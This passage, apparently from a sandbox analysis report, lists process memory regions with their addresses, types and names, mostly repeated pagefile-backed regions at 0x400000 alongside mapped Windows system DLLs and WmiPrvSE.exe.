5228 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5229 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5230 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5231 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5232 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5233 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5234 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5235 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5236 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5237 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5238 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5239 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5240 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5241 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5242 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5243 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5244 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5245 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5246 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5247 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5248 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5249 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5250 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5251 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5252 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5253 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5254 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5255 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5256 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5257 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5258 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5259 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5260 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5261 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5262 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5263 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5264 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5265 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5266 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5267 start_va = 0x7ff83ba30000 end_va = 0x7ff83ba3afff monitored = 0 entry_point = 0x7ff83ba31de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 5268 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5269 start_va = 0x7ff83b900000 end_va = 0x7ff83b919fff monitored = 0 entry_point = 0x7ff83b9045a0 region_type = mapped_file name = "esentprf.dll" filename = "\\Windows\\System32\\esentprf.dll" (normalized: "c:\\windows\\system32\\esentprf.dll") Region: id = 5270 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5271 start_va = 0x420000 end_va = 0x423fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 5272 start_va = 0x7ff839b10000 end_va = 0x7ff839b1bfff monitored = 0 entry_point = 0x7ff839b135c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 5273 start_va = 0x420000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5274 start_va = 0x7ff83b8a0000 end_va = 0x7ff83b8f2fff monitored = 0 entry_point = 0x7ff83b8cab30 region_type = mapped_file name = "msdtcuiu.dll" filename = "\\Windows\\System32\\msdtcuiu.dll" (normalized: "c:\\windows\\system32\\msdtcuiu.dll") Region: id = 5275 start_va = 0x430000 end_va = 0x431fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 5276 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 5277 start_va = 0x7ff846200000 end_va = 0x7ff846342fff monitored = 0 entry_point = 0x7ff846228210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5278 start_va = 0x7ff843750000 end_va = 0x7ff844caefff monitored = 0 entry_point = 0x7ff8438b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5279 start_va = 0x7ff842e70000 end_va = 0x7ff8434b3fff monitored = 0 entry_point = 0x7ff8430364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5280 start_va = 0x7ff843690000 end_va = 0x7ff843744fff monitored = 0 entry_point = 0x7ff8436d22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5281 start_va = 0x7ff842970000 end_va = 0x7ff8429bafff monitored = 0 entry_point = 0x7ff8429735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5282 start_va = 0x7ff8429c0000 end_va = 0x7ff8429d3fff monitored = 0 entry_point = 0x7ff8429c52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5283 start_va = 0x7ff8413e0000 end_va = 0x7ff841489fff monitored = 0 entry_point = 0x7ff841407910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5284 start_va = 0x7ff845250000 end_va = 0x7ff845257fff monitored = 0 entry_point = 0x7ff845251ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5285 start_va = 0x7ff837ce0000 end_va = 0x7ff837cfdfff monitored = 0 entry_point = 0x7ff837ce3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 5286 start_va = 0x7ff82cec0000 end_va = 0x7ff82cf9cfff monitored = 0 entry_point = 0x7ff82cf3d590 region_type = mapped_file name = "msdtcprx.dll" filename = "\\Windows\\System32\\msdtcprx.dll" (normalized: "c:\\windows\\system32\\msdtcprx.dll") Region: id = 5287 start_va = 0x7ff83b600000 end_va = 0x7ff83b669fff monitored = 0 entry_point = 0x7ff83b62e410 region_type = mapped_file name = "mtxclu.dll" filename = "\\Windows\\System32\\mtxclu.dll" (normalized: "c:\\windows\\system32\\mtxclu.dll") Region: id = 5288 start_va = 0x7ff839430000 end_va = 0x7ff8394d2fff monitored = 0 entry_point = 0x7ff839432c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 5289 start_va = 0x7ff8394e0000 end_va = 0x7ff839531fff monitored = 0 entry_point = 0x7ff8394e5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 5290 start_va = 0x7ff83bd50000 end_va = 0x7ff83bd5afff monitored = 0 entry_point = 0x7ff83bd524e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 5291 start_va = 0x7ff8422f0000 end_va = 0x7ff842306fff monitored = 0 entry_point = 0x7ff8422f79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5292 start_va = 0x7ff842540000 end_va = 0x7ff842566fff monitored = 0 entry_point = 0x7ff842550aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 5293 start_va = 0x7ff842500000 end_va = 0x7ff842539fff monitored = 0 entry_point = 0x7ff842508d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 5294 start_va = 0x7ff83d300000 end_va = 0x7ff83d315fff monitored = 0 entry_point = 0x7ff83d301b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5295 start_va = 0x7ff837ca0000 end_va = 0x7ff837cb1fff monitored = 0 entry_point = 0x7ff837ca3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 5296 start_va = 0x7ff841d80000 end_va = 0x7ff841d8bfff monitored = 0 entry_point = 0x7ff841d827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5297 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 5298 start_va = 0x7ff83b890000 end_va = 0x7ff83b89ffff monitored = 0 entry_point = 0x7ff83b895b40 region_type = mapped_file name = "msscntrs.dll" filename = "\\Windows\\System32\\msscntrs.dll" (normalized: "c:\\windows\\system32\\msscntrs.dll") Region: id = 5299 start_va = 0x7ff83b880000 end_va = 0x7ff83b88ffff monitored = 0 entry_point = 0x7ff83b885870 region_type = mapped_file name = "perfdisk.dll" filename = "\\Windows\\System32\\perfdisk.dll" (normalized: "c:\\windows\\system32\\perfdisk.dll") Region: id = 5300 start_va = 0x2af0000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 5301 start_va = 0x7ff83b7c0000 end_va = 0x7ff83b7cafff monitored = 0 entry_point = 0x7ff83b7c2e30 region_type = mapped_file name = "perfnet.dll" filename = "\\Windows\\System32\\perfnet.dll" (normalized: "c:\\windows\\system32\\perfnet.dll") Region: id = 5302 start_va = 0x7ff842b60000 end_va = 0x7ff842b76fff monitored = 0 entry_point = 0x7ff842b61390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5303 start_va = 0x7ff83b7a0000 end_va = 0x7ff83b7b3fff monitored = 0 entry_point = 0x7ff83b7a1310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5304 start_va = 0x7ff83b790000 end_va = 0x7ff83b79dfff monitored = 0 entry_point = 0x7ff83b792b10 region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Region: id = 5305 start_va = 0x2b70000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 5306 start_va = 0x7ff839800000 end_va = 0x7ff83990dfff monitored = 0 entry_point = 0x7ff839867960 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 5307 start_va = 0x7ff83b5f0000 end_va = 0x7ff83b5f9fff monitored = 0 entry_point = 0x7ff83b5f31a0 region_type = mapped_file name = "rasctrs.dll" filename = "\\Windows\\System32\\rasctrs.dll" (normalized: "c:\\windows\\system32\\rasctrs.dll") Region: id = 5308 start_va = 0x2bf0000 end_va = 0x2c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 5309 start_va = 0x7ff83c2a0000 end_va = 0x7ff83c323fff monitored = 0 entry_point = 0x7ff83c2b2830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 5310 start_va = 0x7ff83b5e0000 end_va = 0x7ff83b5e7fff monitored = 0 entry_point = 0x7ff83b5e18a0 region_type = mapped_file name = "tapiperf.dll" filename = "\\Windows\\System32\\tapiperf.dll" (normalized: "c:\\windows\\system32\\tapiperf.dll") Region: id = 5311 start_va = 0x7ff83b5c0000 end_va = 0x7ff83b5d0fff monitored = 0 entry_point = 0x7ff83b5c5840 region_type = mapped_file name = "perfctrs.dll" filename = "\\Windows\\System32\\perfctrs.dll" (normalized: "c:\\windows\\system32\\perfctrs.dll") Region: id = 5312 start_va = 0x7ff83e130000 end_va = 0x7ff83e167fff monitored = 0 entry_point = 0x7ff83e148cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5313 start_va = 0x7ff83b550000 end_va = 0x7ff83b557fff monitored = 0 entry_point = 0x7ff83b552420 region_type = mapped_file name = "perfts.dll" filename = "\\Windows\\System32\\perfts.dll" (normalized: "c:\\windows\\system32\\perfts.dll") Region: id = 5314 start_va = 0x7ff8424a0000 end_va = 0x7ff8424f5fff monitored = 0 entry_point = 0x7ff8424b0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5315 start_va = 0x7ff83b530000 end_va = 0x7ff83b547fff monitored = 0 entry_point = 0x7ff83b531630 region_type = mapped_file name = "utildll.dll" filename = "\\Windows\\System32\\utildll.dll" (normalized: "c:\\windows\\system32\\utildll.dll") Region: id = 5316 start_va = 0x7ff8454b0000 end_va = 0x7ff8458d8fff monitored = 0 entry_point = 0x7ff8454d8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 5317 start_va = 0x7ff8372a0000 end_va = 0x7ff8372c5fff monitored = 0 entry_point = 0x7ff8372a1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5318 start_va = 0x7ff839700000 end_va = 0x7ff839718fff monitored = 0 entry_point = 0x7ff839704520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5319 start_va = 0x7ff83dc80000 end_va = 0x7ff83dcbdfff monitored = 0 entry_point = 0x7ff83dc8a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5320 start_va = 0x7ff83b520000 end_va = 0x7ff83b527fff monitored = 0 entry_point = 0x7ff83b521e20 region_type = mapped_file name = "usbperf.dll" filename = "\\Windows\\System32\\usbperf.dll" (normalized: "c:\\windows\\system32\\usbperf.dll") Region: id = 5321 start_va = 0x7ff83b4f0000 end_va = 0x7ff83b515fff monitored = 0 entry_point = 0x7ff83b500d80 region_type = mapped_file name = "wmiaprpl.dll" filename = "\\Windows\\System32\\wbem\\WmiApRpl.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiaprpl.dll") Region: id = 5322 start_va = 0x7ff83c230000 end_va = 0x7ff83c254fff monitored = 0 entry_point = 0x7ff83c23b320 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 5323 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 5324 start_va = 0x7ff828e20000 end_va = 0x7ff82918efff monitored = 0 entry_point = 0x7ff828f21610 region_type = mapped_file name = "tquery.dll" filename = "\\Windows\\System32\\tquery.dll" (normalized: "c:\\windows\\system32\\tquery.dll") Region: id = 5325 start_va = 0x13b0000 end_va = 0x14effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 5326 start_va = 0x7ff83c4c0000 end_va = 0x7ff83c4cefff monitored = 0 entry_point = 0x7ff83c4c1420 region_type = mapped_file name = "netfxperf.dll" filename = "\\Windows\\System32\\netfxperf.dll" (normalized: "c:\\windows\\system32\\netfxperf.dll") Region: id = 5327 start_va = 0x400000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5328 start_va = 0x14f0000 end_va = 0x156bfff monitored = 0 entry_point = 0x1505f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 5329 start_va = 0x7ff83b8f0000 end_va = 0x7ff83b915fff monitored = 1 entry_point = 0x7ff83b8fd7fc region_type = mapped_file name = "corperfmonext.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\CORPerfMonExt.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\corperfmonext.dll") Region: id = 5330 start_va = 0x7ff82cea0000 end_va = 0x7ff82cf96fff monitored = 0 entry_point = 0x7ff82cec4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 5331 start_va = 0x7ff83d570000 end_va = 0x7ff83d582fff monitored = 0 entry_point = 0x7ff83d572760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5332 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5333 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5334 start_va = 0x2c70000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 5335 start_va = 0x400000 end_va = 0x41bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5336 start_va = 0x2cf0000 end_va = 0x34effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002cf0000" filename = "" Region: id = 5337 start_va = 0x420000 end_va = 0x438fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5338 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5339 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5340 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5341 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5342 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5343 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5344 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5345 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5346 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5347 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5348 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5349 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5350 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5351 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5352 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5353 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5354 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5355 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5356 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5357 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5358 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5359 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5360 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5361 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5362 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5363 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5364 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5365 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5366 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5367 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5368 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5369 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5370 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5371 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5372 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5373 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5374 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5375 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5376 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5377 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5378 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5379 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5380 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5381 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = 